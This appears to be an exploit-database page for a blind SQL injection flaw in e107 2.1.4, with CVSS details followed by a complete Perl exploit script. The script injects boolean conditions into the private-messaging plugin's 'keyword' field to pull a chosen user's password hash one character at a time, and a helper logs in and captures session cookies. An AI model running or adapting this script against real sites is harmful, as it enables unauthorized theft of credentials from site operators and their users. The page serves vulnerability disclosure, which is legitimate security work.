Exploitalert - Database of Exploits

e107 2.1.4 Blind SQL Injection

CVE	Category	Price	Severity
N/A	CWE-89	Not specified	High

Author	Risk	Exploitation Type	Date
Unknown	High	Remote	2017-03-12

CVSS	EPSS	EPSSP
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H	0.02192	0.50148

CVSS vector description

Metric	Value	Metric Description	Value Description
Attack vector	Network	AV	The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity	Low	AC	The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required	High	PR	The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable system allowing full access to the vulnerable system’s settings and files.
User Interaction	None	UI	The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope	Unchanged	S	An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality	High	C	There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity	High	I	There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability	High	A	There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.

https://cxsecurity.com/ascii/WLB-2017030112

e107 2.1.4 Blind SQL Injection#!/usr/bin/perl # # # e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit # # -------------------------------------------------------------------------- # [*] Discovered by staker - staker[at]hotmail[dot]it # [*] Discovered on 09/03/2017 # [*] Site Vendor: http://www.e107.org # [*] BUG: Blind SQL Injection # -------------------------------------------------------------------------- # # # Description # ------------------------------------------------------------------------- # e107 contains one flaw that allows an attacker to carry out an SQL # injection attack. The issue is due to the "e107_plugins/pm/pm.php" script # not properly saniting user-supplied input to the "keyword" POST variable # This may allow an attacker to inject or manipulate sql queries in # the backend database regardless of php.ini settings # ------------------------------------------------------------------------- # SHORT EXPLANATION # ----------------------------------- # # FILE: "e107_handlers/core_functions.php" # # 76. function vartrue(&$val, $default='') # 77. { # 78. if (isset($val) && $val) { return $val; } {1} <--- variable is not sanized to be sent at the mysql database # 79. return $default; # 80.} # # ---------------------------------- # # FILE: "e107/e107_plugins/pm/pm.php" # # # 35. if(vartrue($_POST['keyword'])) {2}<--- if $_POST keyword variable is set, then e107 starts pm_user_lookup() function. # 36. { # 37. pm_user_lookup(); # 38.} # # # # 615. function pm_user_lookup() # 616. { # 617. $sql = e107::getDb(); # 618. # 619. $query = "SELECT * FROM #user WHERE user_name REGEXP '^".$_POST['keyword']."' "; {3} <---- variable not sanized # 620. if($sql->gen($query)) # 621. { # 622. echo '['; # 623 while($row = $sql->fetch()) # 624. { # 625. $u[] = "{\"caption\":\"".$row['user_name']."\",\"value\":".$row['user_id']."}"; # 626. } # 627. # 628. echo implode(",",$u); # 629. echo ']'; # ----------------------------------- # # # use your brain.. # # Greetz to: Warwolfz Crew, # meh, Dante90, SHADES MASTER and nexen # # -- 0gay -- # # ----------------------------------- # YOUR MOM IS NOT SAFE ANYMORE!! # CALL HER!! # ----------------------------------- use strict; use IO::Socket::INET; use LWP::UserAgent; my ($URL,$uid) = @ARGV; my @chars = (8..122); my ($i,$ord,$hash) = (1,undef,undef); if (@ARGV != 2) { usage(); } $URL = parse::URL($URL); syswrite (STDOUT,"[-] Crypted Password: "); for ($i=0;$i<=60;$i++) { foreach $ord (@chars) { if (e107::Query(sql($i,$ord),$URL) == 666 ) { syswrite (STDOUT,chr($ord)); $hash .= chr($ord); last; } if ($i == 2 and not defined $hash) { syswrite (STDOUT,"\n[-] Exploit Failed"); exit; } } } if (length($hash) == 60) { die "\[-]Exploit Successfully"; } else { die "\n[-] Exploit Failed"; } sub e107::Query { # 1st parameter, sql query # 2nd parameter, e107 website my ($query,$URL) = @_; my $response = undef; my $lwp = new LWP::UserAgent; $lwp->default_header('User-Agent' => 'Lynx (textmode)'); $response = $lwp->post($URL."/pm/", [ keyword => $query ]) or die $!; if ($response->content =~ /caption/) { return 666; } else { return 0; } } sub parse::URL { my $string = shift @_ || die($!); if ($string !~ /^http:\/\/?/i) { $string = 'http://'.$string; } return $string; } sub sql { # 1st parameter, an e107's userid # 2nd parameter substring number # 3rd parameter charcode number my ($i,$j,$sql) = (shift,shift,undef); $sql = "' AND ASCII(SUBSTRING((SELECT user_password FROM e107_user WHERE user_id=".$uid."),".$i.",1))=".$j."#"; return $sql; } sub e107::Cookies { my ($username,$password) = @_; my ($packet,$content); my $host = "127.0.0.1"; # Valid Host (insert it manually) my $path = "/e107/"; # Valid e107 path (insert it manually) my $data = "username=",$username."&userpass=".$password."&userlogin=Sign+In"; my $socket = new IO::Socket::INET( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', ) or die $!; $packet .= "POST ".$path."/login.php HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "User-Agent: Lynx (textmode)\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length:".length($data)."\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet.= $data; $socket->send($packet); while (<$socket>) { $content .= $_; } if ($content =~ /Set-Cookie: (.+?)/) { return $1; } else { die("[-] Login Failed..\n"); } # This function is useful to log-in and retrieves your cookies, but you don't need it for this exploit. # it works without log-in, but if you got some trouble, try to use this one. # e107::Login('YOUR USERNAME','YOUR PASSWORD'); } sub usage() { print "[*---------------------------------------------------------*]\n". "[* e107 <= 2.1.4 'keyword' Blind SQL Injection Exploit *]\n". "[*---------------------------------------------------------*]\n". "[* Usage: perl web.pl [host] [uid] *]\n". "[* *]\n". "[* Options: *]\n". "[* [host] insert a valid host *]\n". "[* [uid] insert a userid *]\n". "[*---------------------------------------------------------*]\n"; exit; }

Impressum